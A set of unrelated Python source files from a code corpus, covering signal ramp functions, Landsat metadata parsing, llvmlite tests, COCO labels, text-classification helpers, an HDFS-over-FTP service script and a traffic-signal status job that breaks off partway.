interp = (time_subarray - start_time)/(end_time - start_time)
return value_initial*(1.0 - interp) + value_final2*interp
def analog_quadratic_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
value_initial = ramp_data["value"]
slope = ramp_data["slope"]
delta_t = end_time - start_time
delta_v = value_final - value_initial
curvature = (delta_v - slope*delta_t)/delta_t**2
tmt0 = time_subarray - start_time
return value_initial + slope*tmt0 + curvature*tmt0**2
def analog_quadratic2_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
value_initial = ramp_data["value"]
curvature = ramp_data["curvature"]
delta_t = end_time - start_time
delta_v = value_final - value_initial
slope = (delta_v - curvature*delta_t**2)/delta_t
tmt0 = time_subarray - start_time
return value_initial + slope*tmt0 + curvature*tmt0**2
def analog_exp_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
value_initial = ramp_data["value"]
tau = ramp_data["tau"]
if tau == 0:
return analog_jump_ramp(ramp_data, start_time, end_time, value_final,
time_subarray)
delta_t = end_time - start_time
delta_v = value_final - value_initial
tmt0 = time_subarray - start_time
b = delta_v/(np.exp(delta_t/tau) - 1.0)
a = value_initial - b
return a + b*np.exp(tmt0/tau)
def analog_sine_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
delta_t = time_subarray - start_time
return (ramp_data['value'] +
ramp_data['amp']*np.sin(2.0*np.pi*ramp_data['freq']*delta_t +
ramp_data['phase']))
def analog_jump_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
return np.ones(time_subarray.shape)*(ramp_data["value"])
def analog_cubic_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
return analog_jump_ramp(ramp_data, start_time, end_time, value_final,
time_subarray)
# Digital ramp functions start here
def digital_jump_ramp(ramp_data, start_time, end_time, state,
time_subarray):
return np.ones(time_subarray.shape, dtype=int)*int(state)
def digital_pulsetrain_ramp(ramp_data, start_time, end_time, state,
time_subarray):
phase = (time_subarray - start_time)*ramp_data['freq']
phase += ramp_data['phase']/np.pi/2.0
duty_cycle = ramp_data['duty_cycle']
train = np.array((phase % 1.0) < duty_cycle, dtype=int) * int(state)
return train
analog_ramp_types = {"jump": ["value"],
"quadratic": ["value", "slope"],
"linear": ["value"],
"linear2": ["value", "value_final"],
"cubic": ["value", "slope_left", "slope_right"],
"sine": ["value", "amp", "freq", "phase"],
"quadratic2": ["value", "curvature"],
"exp": ["value", "tau"]}
digital_ramp_types = {"jump": [],
"pulsetrain": ["freq", "phase", "duty_cycle"]}
analog_ramp_functions = {"jump": analog_jump_ramp,
"linear": analog_linear_ramp,
"linear2": analog_linear2_ramp,
"quadratic": analog_quadratic_ramp,
"cubic": analog_cubic_ramp,
"sine": analog_sine_ramp,
"quadratic2": analog_quadratic2_ramp,
"exp": analog_exp_ramp}
digital_ramp_functions = {"jump": digital_jump_ramp,
"pulsetrain": digital_pulsetrain_ramp}
if __name__ == '__main__':
with open('examples/test_scene.json', 'r') as f:
data = json.load(f)
kfl = KeyFrameList(data['keyframes'])
channels = [Channel(ch_name, dct, kfl)
for ch_name, dct in data['channels'].items()]
ch = channels[0]
| StarcoderdataPython |
12842202 | from collections import defaultdict
from datetime import datetime
from typing import Any, Dict, List, Optional
from pyproj import Geod
from pystac.utils import str_to_datetime
from stactools.core.io import ReadHrefModifier
from stactools.core.io.xml import XmlElement
from stactools.core.projection import transform_from_bbox
from stactools.core.utils import map_opt
class MTLError(Exception):
pass
class MtlMetadata:
"""Parses a Collection 2 MTL XML file.
References https://github.com/sat-utils/sat-stac-landsat/blob/f2263485043a827b4153aecc12f45a3d1363e9e2/satstac/landsat/main.py#L157
""" # noqa
def __init__(self,
root: XmlElement,
href: Optional[str] = None,
legacy_l8: bool = True):
self._root = root
self.href = href
self.legacy_l8 = legacy_l8
def _xml_error(self, item: str) -> MTLError:
return MTLError(f"Cannot find {item} in MTL metadata" +
("" if self.href is None else f" at {self.href}"))
def _get_text(self, xpath: str) -> str:
return self._root.find_text_or_throw(xpath, self._xml_error)
def _get_float(self, xpath: str) -> float:
return float(self._get_text(xpath))
def _get_int(self, xpath: str) -> int:
return int(self._get_text(xpath))
@property
def satellite_num(self) -> int:
"""Return the Landsat satellite number."""
return int(self.product_id[2:4])
@property
def product_id(self) -> str:
"""Return the Landsat product ID."""
return self._get_text("PRODUCT_CONTENTS/LANDSAT_PRODUCT_ID")
@property
def item_id(self) -> str:
# Remove the processing date, as products IDs
# that only vary by processing date represent the
# same scene
# See "Section 5 - Product Packaging" at
# https://prd-wret.s3.us-west-2.amazonaws.com/assets/palladium/production/atoms/files/LSDS-1619_Landsat8-C2-L2-ScienceProductGuide-v2.pdf # noqa
# ID format: LXSS_LLLL_PPPRRR_YYYYMMDD_yyyymmdd_CX_TX
# remove yyyymmdd
id_parts = self.product_id.split('_')
id = '_'.join(id_parts[:4] + id_parts[-2:])
return id
@property
def scene_id(self) -> str:
""""Return the Landsat scene ID."""
return self._get_text("LEVEL1_PROCESSING_RECORD/LANDSAT_SCENE_ID")
@property
def processing_level(self) -> str:
"""Processing level. Determines product contents.
Returns either 'L2SP' or 'L2SR', standing for
'Level 2 Science Product' and 'Level 2 Surface Reflectance',
respectively. L2SP has thermal + surface reflectance assets;
L2SR only has surface reflectance.
"""
return self._get_text("PRODUCT_CONTENTS/PROCESSING_LEVEL")
@property
def epsg(self) -> int:
utm_zone = self._root.find_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
if utm_zone:
if self.satellite_num == 8 and self.legacy_l8:
# Keep current STAC Item content consistent for Landsat 8
bbox = self.bbox
utm_zone = self._get_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
center_lat = (bbox[1] + bbox[3]) / 2.0
return int(f"{326 if center_lat > 0 else 327}{utm_zone}")
else:
# The projection transforms in the COGs provided by the USGS are
# always for UTM North zones. The EPSG codes should therefore
# be UTM north zones (326XX, where XX is the UTM zone number).
# See: https://www.usgs.gov/faqs/why-do-landsat-scenes-southern-hemisphere-display-negative-utm-values # noqa
utm_zone = self._get_text('PROJECTION_ATTRIBUTES/UTM_ZONE')
return int(f"326{utm_zone}")
else:
# Polar Stereographic
# Based on Landsat 8-9 OLI/TIRS Collection 2 Level 1 Data Format Control Book,
# should only ever be 71 or -71
lat_ts = self._get_text('PROJECTION_ATTRIBUTES/TRUE_SCALE_LAT')
if lat_ts == "-71.00000":
# Antarctic
return 3031
elif lat_ts == "71.00000":
# Arctic
return 3995
else:
raise MTLError(
f'Unexpeced value for PROJECTION_ATTRIBUTES/TRUE_SCALE_LAT: {lat_ts} '
)
@property
def bbox(self) -> List[float]:
# Might be cleaner to just transform the proj bbox to WGS84.
lons = [
self._get_float("PROJECTION_ATTRIBUTES/CORNER_UL_LON_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_UR_LON_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_LL_LON_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_LR_LON_PRODUCT")
]
lats = [
self._get_float("PROJECTION_ATTRIBUTES/CORNER_UL_LAT_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_UR_LAT_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_LL_LAT_PRODUCT"),
self._get_float("PROJECTION_ATTRIBUTES/CORNER_LR_LAT_PRODUCT")
]
geod = Geod(ellps="WGS84")
offset = self.sr_gsd / 2
_, _, bottom_distance = geod.inv(lons[2], lats[2], lons[3], lats[3])
bottom_offset = offset * (lons[3] - lons[2]) / bottom_distance
_, _, top_distance = geod.inv(lons[0], lats[0], lons[1], lats[1])
top_offset = offset * (lons[1] - lons[0]) / top_distance
_, _, lat_distance = geod.inv(lons[0], lats[0], lons[2], lats[2])
lat_offset = offset * (lats[0] - lats[2]) / lat_distance
return [
min(lons) - bottom_offset,
min(lats) - lat_offset,
max(lons) + top_offset,
max(lats) + lat_offset
]
@property
def proj_bbox(self) -> List[float]:
# USGS metadata provide bounds at the center of the pixel, but
# GDAL/rasterio transforms are to edge of pixel.
# https://github.com/stac-utils/stactools/issues/117
offset = self.sr_gsd / 2
xs = [
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_UL_PROJECTION_X_PRODUCT") -
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_UR_PROJECTION_X_PRODUCT") +
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_LL_PROJECTION_X_PRODUCT") -
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_LR_PROJECTION_X_PRODUCT") +
offset
]
ys = [
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_UL_PROJECTION_Y_PRODUCT") +
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_UR_PROJECTION_Y_PRODUCT") +
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_LL_PROJECTION_Y_PRODUCT") -
offset,
self._get_float(
"PROJECTION_ATTRIBUTES/CORNER_LR_PROJECTION_Y_PRODUCT") -
offset
]
return [min(xs), min(ys), max(xs), max(ys)]
@property
def sr_shape(self) -> List[int]:
"""Shape for surface reflectance assets.
Used for proj:shape. In [row, col] order"""
return [
self._get_int("PROJECTION_ATTRIBUTES/REFLECTIVE_LINES"),
self._get_int("PROJECTION_ATTRIBUTES/REFLECTIVE_SAMPLES")
]
@property
def thermal_shape(self) -> Optional[List[int]]:
"""Shape for thermal bands.
None if thermal bands not present.
Used for proj:shape. In [row, col] order"""
rows = map_opt(
int, self._root.find_text("PROJECTION_ATTRIBUTES/THERMAL_LINES"))
cols = map_opt(
int, self._root.find_text("PROJECTION_ATTRIBUTES/THERMAL_SAMPLES"))
if rows is not None and cols is not None:
return [rows, cols]
else:
return None
@property
def sr_transform(self) -> List[float]:
return transform_from_bbox(self.proj_bbox, self.sr_shape)
@property
def thermal_transform(self) -> Optional[List[float]]:
return map_opt(
lambda shape: transform_from_bbox(self.proj_bbox, shape),
self.thermal_shape)
@property
def sr_gsd(self) -> float:
return self._get_float(
"LEVEL1_PROJECTION_PARAMETERS/GRID_CELL_SIZE_REFLECTIVE")
@property
def thermal_gsd(self) -> Optional[float]:
return map_opt(
float,
self._root.find_text(
'LEVEL1_PROJECTION_PARAMETERS/GRID_CELL_SIZE_THERMAL'))
@property
def scene_datetime(self) -> datetime:
date = self._get_text("IMAGE_ATTRIBUTES/DATE_ACQUIRED")
time = self._get_text("IMAGE_ATTRIBUTES/SCENE_CENTER_TIME")
return str_to_datetime(f"{date} {time}")
@property
def cloud_cover(self) -> float:
return self._get_float("IMAGE_ATTRIBUTES/CLOUD_COVER")
@property
def sun_azimuth(self) -> float:
"""Returns the sun azimuth in STAC form.
Converts from Landsat metadata form (-180 to 180 from north, west being
negative) to STAC form (0 to 360 clockwise from north).
Returns:
float: Sun azimuth, 0 to 360 clockwise from north.
"""
azimuth = self._get_float("IMAGE_ATTRIBUTES/SUN_AZIMUTH")
if azimuth < 0.0:
azimuth += 360
return azimuth
@property
def sun_elevation(self) -> float:
return self._get_float("IMAGE_ATTRIBUTES/SUN_ELEVATION")
@property
def off_nadir(self) -> Optional[float]:
if self.satellite_num == 8 and self.legacy_l8:
# Keep current STAC Item content consistent for Landsat 8
if self._get_text("IMAGE_ATTRIBUTES/NADIR_OFFNADIR") == "NADIR":
return 0
else:
return None
else:
# NADIR_OFFNADIR and ROLL_ANGLE xml entries do not exist prior to
# landsat 8. Therefore, we perform a soft check for NADIR_OFFNADIR.
# If exists and is equal to "OFFNADIR", then a non-zero ROLL_ANGLE
# exists. We force this ROLL_ANGLE to be positive to conform with
# the stac View Geometry extension. We return 0 otherwise since
# off-nadir views are only an option on Landsat 8-9.
if self._root.find_text(
"IMAGE_ATTRIBUTES/NADIR_OFFNADIR") == "OFFNADIR":
return abs(self._get_float("IMAGE_ATTRIBUTES/ROLL_ANGLE"))
else:
return 0
@property
def wrs_path(self) -> str:
return self._get_text("IMAGE_ATTRIBUTES/WRS_PATH").zfill(3)
@property
def wrs_row(self) -> str:
return self._get_text("IMAGE_ATTRIBUTES/WRS_ROW").zfill(3)
@property
def landsat_metadata(self) -> Dict[str, Any]:
landsat_meta = {
"landsat:cloud_cover_land":
self._get_float("IMAGE_ATTRIBUTES/CLOUD_COVER_LAND"),
"landsat:wrs_type":
self._get_text("IMAGE_ATTRIBUTES/WRS_TYPE"),
"landsat:wrs_path":
self.wrs_path,
"landsat:wrs_row":
self.wrs_row,
"landsat:collection_category":
self._get_text("PRODUCT_CONTENTS/COLLECTION_CATEGORY"),
"landsat:collection_number":
self._get_text("PRODUCT_CONTENTS/COLLECTION_NUMBER"),
"landsat:correction":
self.processing_level,
"landsat:scene_id":
self.scene_id
}
if self.satellite_num == 8 and self.legacy_l8:
landsat_meta["landsat:processing_level"] = landsat_meta.pop(
"landsat:correction")
return landsat_meta
@property
def level1_radiance(self) -> Dict[str, Any]:
"""Gets the scale (mult) and offset (add) values for generating TOA
radiance from Level-1 DNs.
This is relevant to MSS data, which is only processed to Level-1.
Returns:
Dict[str, Any]: Dict of scale and offset dicts, keyed by band
number.
"""
node = self._root.find_or_throw("LEVEL1_RADIOMETRIC_RESCALING",
self._xml_error)
mult_add: Dict[str, Any] = defaultdict(dict)
for item in node.element:
if item.tag.startswith("RADIANCE_MULT_BAND"):
band = f'B{item.tag.split("_")[-1]}'
mult_add[band]["mult"] = float(str(item.text))
elif item.tag.startswith("RADIANCE_ADD_BAND"):
band = f'B{item.tag.split("_")[-1]}'
mult_add[band]["add"] = float(str(item.text))
return mult_add
@classmethod
def from_file(cls,
href: str,
read_href_modifier: Optional[ReadHrefModifier] = None,
legacy_l8: bool = True) -> "MtlMetadata":
return cls(XmlElement.from_file(href, read_href_modifier),
href=href,
legacy_l8=legacy_l8)
| StarcoderdataPython |
11247263 | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from twircbot.twircbot import *
from twircbot.botmodule import *
from twircbot.logger import *
from twircbot.twitchtools import *
| StarcoderdataPython |
1924027 | <gh_stars>0
""" Оповещение администратора о возникших ошибках """
from traceback import format_exception, format_exc
from contextlib import contextmanager
from lib.config import emergency_id
from lib.commands import vk, api
from logging import getLogger
logger = getLogger("GM.lib.errors")
@contextmanager
def ErrorManager(name):
""" Упрощенное оповещение об ошибках
str name: название скрипта (обычно укороченное)
Использование: with ErrorManager(name): main()
"""
try:
yield
except Exception as e:
logger.exception("Exception occured, exiting...")
sendErrorMessage(name)
raise e
def sendErrorMessage(name, exception=None):
""" Использует либо полученную ошибку, либо ту, что возникла последней """
logger.debug("Sending error message...")
exception = format_error(exception)
message = "{}:\n{}".format(name, exception)
vk(api.messages.send, user_id=emergency_id, message=message)
def format_error(error):
if error is not None:
error_info = format_exception(type(error), error, error.__traceback__)
return "".join(error_info)
else:
return format_exc()
| StarcoderdataPython |
223604 | <reponame>AnttiHaerkoenen/grand_duchy
import os
import subprocess
def remove_whitespaces(directory):
directory = os.path.expandvars(os.path.expanduser(directory))
os.chdir(directory)
for fname in os.listdir(directory):
if fname.find(" ") >= 0:
new_fname = fname.replace(" ", "_")
subprocess.call(['mv', fname, new_fname], shell=False)
if os.path.isdir(fname):
os.chdir(fname)
remove_whitespaces(".")
os.chdir("..")
if __name__ == '__main__':
remove_whitespaces('~/sanomalehdet')
| StarcoderdataPython |
86646 | <filename>tests/llvm/test_llvm_lite.py
#!/bin/env python3
# Short example/demonstrator how to create and compile native code using
# LLVM MCJIT just-in-time compiler
from llvmlite import binding,ir
import ctypes
import pytest
try:
import pycuda
from pycuda import autoinit as pycuda_default
# Import this after pycuda since only cuda test needs numpy
import numpy as np
except:
pycuda = None
@pytest.mark.llvm
def test_llvm_lite():
# Create some useful types
double = ir.DoubleType()
fnty = ir.FunctionType(double, (double, double))
# Create an empty module...
module = ir.Module(name=__file__)
# and declare a function named "fpadd" inside it
func = ir.Function(module, fnty, name="fpadd")
# Now implement basic addition
# basic blocks are sequences of instructions that have exactly one
# entry point and one exit point (no control flow)
# We only need one in this case
# See available operations at:
# http://llvmlite.readthedocs.io/en/latest/ir/builder.html#instruction-building
block = func.append_basic_block(name="entry")
builder = ir.IRBuilder(block)
a, b = func.args
result = builder.fadd(a, b, name="res")
builder.ret(result)
# Uncomment to print the module IR. This prints LLVM IR assembly.
# print("LLVM IR:")
# print(module)
binding.initialize()
# native == currently running CPU
binding.initialize_native_target()
# TODO: This prevents 'LLVM ERROR: Target does not support MC emission!',
# but why?
binding.initialize_native_asmprinter()
# Create compilation target, use default triple
target = binding.Target.from_default_triple()
target_machine = target.create_target_machine()
# And an execution engine with an empty backing module
# TODO: why is empty backing mod necessary?
backing_mod = binding.parse_assembly("")
# There are other engines beside MCJIT
# MCJIT makes it easier to run the compiled function right away.
engine = binding.create_mcjit_compiler(backing_mod, target_machine)
# IR module is not the same as binding module.
# "assembly" in this case is LLVM IR assembly
# TODO is there a better way to convert this?
mod = binding.parse_assembly(str(module))
mod.verify()
# Now add the module and make sure it is ready for execution
engine.add_module(mod)
engine.finalize_object()
# Uncomment to print generated x86 assembly
#print("x86 assembly:")
#print(target_machine.emit_assembly(mod))
# Look up the function pointer (a Python int)
# func_ptr is now an address to a compiled function
func_ptr = engine.get_function_address("fpadd")
# Run the function via ctypes
a = 10.0
b = 3.5
cfunc = ctypes.CFUNCTYPE(ctypes.c_double, ctypes.c_double, ctypes.c_double)(func_ptr)
res = cfunc(10.0, 3.5)
assert res == (a + b)
if res != (a + b):
print("TEST FAILED! {} instead of {}".format(res, a + b))
else:
print("TEST PASSED! {} == {}".format(res, a + b))
engine.remove_module(mod)
# TODO: shutdown cleanly
# we need to do something extra before shutdown
#binding.shutdown()
@pytest.mark.llvm
@pytest.mark.cuda
@pytest.mark.skipif(pycuda is None, reason="pyCUDA module is not available")
def test_llvm_lite_ptx_pycuda():
# Create some useful types
double = ir.DoubleType()
fnty = ir.FunctionType(ir.VoidType(), (double, double, double.as_pointer()))
# Create an empty module...
module = ir.Module(name=__file__)
# and declare a function named "fpadd" inside it
func = ir.Function(module, fnty, name="fpadd")
# Now implement basic addition
# basic blocks are sequences of instructions that have exactly one
# entry point and one exit point (no control flow)
# We only need one in this case
# See available operations at:
# http://llvmlite.readthedocs.io/en/latest/ir/builder.html#instruction-building
block = func.append_basic_block(name="entry")
builder = ir.IRBuilder(block)
a, b, res = func.args
result = builder.fadd(a, b, name="res")
builder.store(result, res)
builder.ret_void()
# Add kernel mark metadata
module.add_named_metadata("nvvm.annotations",[func, "kernel", ir.IntType(32)(1)])
# Uncomment to print the module IR. This prints LLVM IR assembly.
# print("LLVM IR:\n", module)
binding.initialize()
binding.initialize_all_targets()
binding.initialize_all_asmprinters()
capability = pycuda_default.device.compute_capability()
# Create compilation target, use default triple
target = binding.Target.from_triple("nvptx64-nvidia-cuda")
target_machine = target.create_target_machine(cpu="sm_{}{}".format(capability[0], capability[1]), codemodel='small')
mod = binding.parse_assembly(str(module))
mod.verify()
ptx = target_machine.emit_assembly(mod)
# Uncomment to print generated x86 assembly
# print("PTX assembly:\n", ptx)
ptx_mod = pycuda.driver.module_from_buffer(ptx.encode())
cuda_func = ptx_mod.get_function('fpadd')
# Run the function via ctypes
a = np.float64(10.0)
b = np.float64(3.5)
res = np.empty(1, dtype=np.float64)
dev_res = pycuda.driver.Out(res)
cuda_func(a, b, dev_res, block=(1,1,1))
assert res[0] == (a + b)
| StarcoderdataPython |
3302350 | <filename>scripts/coco_label.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import json
import os
def main(opt):
# TRAIN_INS = '../data/COCO/annotations/instances_train2014.json'
# VALID_INS = '../data/COCO/annotations/instances_val2014.json'
# COCO_DATA = '../data/COCO/dataset_coco.json'
# OUT_DIR = '../data/COCO/'
TRAIN_INS = opt.train
VALID_INS = opt.val
COCO_DATA = opt.dataset
OUT_DIR = opt.output
train_data = json.load(open(TRAIN_INS, 'r'))
val_data = json.load(open(VALID_INS, 'r'))
data = json.load(open(COCO_DATA, 'r'))
trans = {}
for info in data['images']:
trans[info['imgid']] = info['cocoid']
cate_map = {}
for i, cate in enumerate(train_data['categories']):
cate_map[cate['id']] = i
label = {}
for info in train_data['annotations']:
if info['image_id'] in label:
label[info['image_id']].append(cate_map[info['category_id']])
else:
label[info['image_id']] = []
for info in val_data['annotations']:
if info['image_id'] in label:
label[info['image_id']].append(cate_map[info['category_id']])
else:
label[info['image_id']] = []
for k, v in label.items():
label[k] = list(set(v))
all_label = np.zeros([123287, 80], dtype=np.float32)
for i in range(len(all_label)):
try:
all_label[i, label[trans[i]]] = 1.
except:
pass
np.save(os.path.join(OUT_DIR, 'labels.npy'), all_label)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--train', type=str, help='Path to instances_train2014.json')
parser.add_argument('--val', type=str, help='Path to instances_val2014.json')
parser.add_argument('--dataset', type=str, help='Path to dataset_coco.json')
parser.add_argument('--output', type=str, help='Folder to save label file')
opt = parser.parse_args()
main(opt)
| StarcoderdataPython |
1817973 | <filename>7kyu/youre_a_square.py
# http://www.codewars.com/kata/54c27a33fb7da0db0100040e/
def is_square(n):
return n > 0 and (n ** 0.5).is_integer()
| StarcoderdataPython |
6604999 | <gh_stars>1-10
import pytest
from .day_9 import parse_input, get_non_composable, get_key
@pytest.fixture()
def example_input():
return parse_input(
"""35
20
15
25
47
40
62
55
65
95
102
117
150
182
127
219
299
277
309
576"""
)
@pytest.fixture()
def puzzle_input():
with open("../inputs/day_9.txt", "r") as f:
return parse_input(f.read())
def test_example_part_1(example_input):
assert get_non_composable(example_input, 5) == 127
def test_input_part_1(puzzle_input):
assert get_non_composable(puzzle_input, 25) == 1930745883
def test_example_part_2(example_input):
assert get_key(example_input, 5) == 62
def test_input_part_2(puzzle_input):
assert get_key(puzzle_input, 25) == 268878261
| StarcoderdataPython |
63294 | <reponame>jpbelleau/hdfs-over-ftp-slider
#!/usr/bin/env python
import sys
from resource_management import *
class HDFSFTP(Script):
def install(self, env):
self.install_packages(env)
def configure(self, env):
import os
import params
env.set_params(params)
keystore_path = params.app_root + "/" + params.keystore_file
File(format("{params.log_dir}/hdfs-over-ftp.log"),
mode=0666,
owner=params.app_user,
group=params.user_group
)
TemplateConfig(format("{app_root}/log4j.xml"), owner = params.app_user, group = params.user_group)
#TemplateConfig(format("{app_root}/hdfs-over-ftp.properties"), owner = params.app_user, group = params.user_group)
PropertiesFile(format("{app_root}/hdfs-over-ftp.properties"),
properties = params.config['configurations']['hdfsftp'],
owner = params.app_user,
group = params.user_group
)
PropertiesFile(format("{app_root}/users.properties"),
properties = params.config['configurations']['usersprops'],
owner = params.app_user,
group = params.user_group
)
if not os.path.exists(keystore_path):
Execute(format("{hdfs_bin} dfs -get {keystore_in_hdfs} {keystore_path}"),
user=params.app_user)
File(keystore_path,
mode=0600,
group=params.app_user,
owner=params.user_group,
replace=False)
def start(self, env):
import params
env.set_params(params)
self.configure(env)
process_cmd = format("{java64_home}/jre/bin/java {params.java_opts} -Dcom.sun.management.jmxremote.port={params.jmxport} -Dcom.sun.management.jmxremote.rmi.port={params.jmxport} -cp {params.app_root}/:{params.app_root}/lib/* org.apache.hadoop.contrib.ftp.HdfsOverFtpServer --approot {params.app_root} > {params.log_dir}/hdfsftp-output.log 2>&1")
#user=params.app_user,
Execute(process_cmd,
logoutput=True,
wait_for_finish=False,
pid_file=params.pid_file
)
def stop(self, env):
import params
env.set_params(params)
def status(self, env):
import params
env.set_params(params)
check_process_status(params.pid_file)
if __name__ == "__main__":
HDFSFTP().execute()
| StarcoderdataPython |
3465456 | <gh_stars>1-10
#!/usr/bin/python3
'''
Convert Gend scores
from the PYM dataset to values between -1(most masculine)
and +1 (most feminine)
'''
import re
num_re = re.compile("^\d+(\.\d+)?$")
with open("pym_data.txt", "r") as pym_data_f:
for line in pym_data_f:
line = line.strip()
parameters = line.split()
#valid data
if (len(parameters) == 35):
word = parameters[2]
gend = parameters[32]
if (re.match(num_re, gend)):
new_score = (float(gend) - 4.05)/4.05;
print(word + "," + str(new_score))
| StarcoderdataPython |
1798324 | <filename>Short Text Classification/Text_Classification/data_helpers.py
# encoding: UTF-8
import numpy as np
import re
import itertools
from collections import Counter
import os
import word2vec_helpers
import time
import pickle
def load_data_and_labels(input_text_file, input_label_file, num_labels):
x_text = read_and_clean_zh_file(input_text_file)
y = None if not os.path.exists(input_label_file) else map(int, list(open(input_label_file, "r").readlines()))
return (x_text, y)
def load_positive_negative_data_files(positive_data_file, negative_data_file, video_data_file):
"""
Loads MR polarity data from files, splits the data into words and generates labels.
Returns split sentences and labels.
"""
# Load data from files
cooking_examples = read_and_clean_zh_file(positive_data_file)
music_examples = read_and_clean_zh_file(negative_data_file)
video_examples = read_and_clean_zh_file(video_data_file)
# Combine data
x_text = cooking_examples + music_examples + video_examples
# Generate labels
cooking_labels = [[0, 0, 1] for _ in cooking_examples]
music_labels = [[0, 1, 0] for _ in music_examples]
video_labels = [[1, 0, 0] for _ in video_examples]
y = np.concatenate([cooking_labels, music_labels, video_labels], 0)
return [x_text, y]
def padding_sentences(input_sentences, padding_token, padding_sentence_length=None):
sentences = [sentence.split(' ') for sentence in input_sentences]
max_sentence_length = padding_sentence_length if padding_sentence_length is not None else max(
[len(sentence) for sentence in sentences])
new_sentences = []
for sentence in sentences:
if len(sentence) > max_sentence_length:
sentence = sentence[:max_sentence_length]
else:
sentence.extend([padding_token] * (max_sentence_length - len(sentence)))
new_sentences.append(sentence)
return (new_sentences, max_sentence_length)
def batch_iter(data, batch_size, num_epochs, shuffle=True):
'''
Generate a batch iterator for a dataset
'''
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int((data_size - 1) / batch_size) + 1
for epoch in range(num_epochs):
if shuffle:
# Shuffle the data at each epoch
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
else:
shuffled_data = data
for batch_num in range(num_batches_per_epoch):
start_idx = batch_num * batch_size
end_idx = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_idx: end_idx]
def test():
# Test clean_str
print("Test")
# print(clean_str("This's a huge dog! Who're going to the top."))
# Test load_positive_negative_data_files
# x_text,y = load_positive_negative_data_files("./tiny_data/rt-polarity.pos", "./tiny_data/rt-polarity.neg")
# print(x_text)
# print(y)
# Test batch_iter
# batches = batch_iter(x_text, 2, 4)
# for batch in batches:
# print(batch)
def mkdir_if_not_exist(dirpath):
if not os.path.exists(dirpath):
os.mkdir(dirpath)
def seperate_line(line):
return ''.join([word + ' ' for word in line])
def read_and_clean_zh_file(input_file, output_cleaned_file=None):
lines = list(open(input_file, "rb").readlines())
lines = [clean_str(seperate_line(line.decode('utf-8'))) for line in lines]
if output_cleaned_file is not None:
with open(output_cleaned_file, 'w') as f:
for line in lines:
f.write((line + '\n').encode('utf-8'))
return lines
def clean_str(string):
string = re.sub(r"[^\u4e00-\u9fff]", " ", string)
# string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
# string = re.sub(r"\'s", " \'s", string)
# string = re.sub(r"\'ve", " \'ve", string)
# string = re.sub(r"n\'t", " n\'t", string)
# string = re.sub(r"\'re", " \'re", string)
# string = re.sub(r"\'d", " \'d", string)
# string = re.sub(r"\'ll", " \'ll", string)
# string = re.sub(r",", " , ", string)
# string = re.sub(r"!", " ! ", string)
# string = re.sub(r"\(", " \( ", string)
# string = re.sub(r"\)", " \) ", string)
# string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
# return string.strip().lower()
return string.strip()
def saveDict(input_dict, output_file):
with open(output_file, 'wb') as f:
pickle.dump(input_dict, f)
def loadDict(dict_file):
output_dict = None
with open(dict_file, 'rb') as f:
output_dict = pickle.load(f)
return output_dict
| StarcoderdataPython |
4838183 | <gh_stars>1-10
# Attributes:
# FLASH_STATUSES (list): Description
# SOCR_SIG_RES_ID (str): Description
# SOCR_SIG_STAT_RES_ID (str): Description
import os
import pdb
import sys
import arrow
import kitsutil
import datautil
import emailutil
import jobutil
import logutil
import socratautil
import _setpath
from config.knack.config import cfg
from config.secrets import *
# define config variables
SOCR_SIG_RES_ID = "xwqn-2f78"
SOCR_SIG_STAT_RES_ID = "5zpr-dehc"
FLASH_STATUSES = ["1", "2", "3"]
def add_ids(records, primary_key="signal_id", id_field="record_id"):
"""
Generate a unique record ID which is a concatenation of the signal ID and the current time
Args:
records (TYPE): Description
primary_key (str, optional): Description
id_field (str, optional): Description
Returns:
TYPE: Description
"""
now = arrow.now().timestamp
for record in records:
if not record.get("record_id"):
record["record_id"] = "{}_{}".format(record[primary_key], now)
return records
def add_timestamps(records, timestamp_field="processed_datetime"):
"""Summary
Args:
records (TYPE): Description
timestamp_field (str, optional): Description
Returns:
TYPE: Description
"""
now = arrow.now().timestamp
for record in records:
record[timestamp_field] = now
return records
def main():
"""Summary
Args:
jobs (TYPE): Description
**kwargs: Description
Returns:
TYPE: Description
"""
# get current traffic signal data from Socrata
socr = socratautil.Soda(resource=SOCR_SIG_RES_ID)
signal_data = socr.data
kits_query = kitsutil.status_query()
kits_data = kitsutil.data_as_dict(KITS_CREDENTIALS, kits_query)
kits_data = datautil.replace_timezone(kits_data, ["OPERATION_STATE_DATETIME"])
kits_data = datautil.stringify_key_values(kits_data)
# verify the KITS data is current
# sometimes the signal status service goes down
# in which case contact ATMS support
stale = kitsutil.check_for_stale(kits_data, "OPERATION_STATE_DATETIME")
# filter KITS data for statuses of concern
kits_data = datautil.filter_by_val(kits_data, "OPERATION_STATE", FLASH_STATUSES)
# append kits data to signal data
if kits_data:
new_data = datautil.lower_case_keys(kits_data)
new_data = datautil.merge_dicts(
signal_data,
new_data,
"signal_id",
["operation_state_datetime", "operation_state", "plan_id"],
)
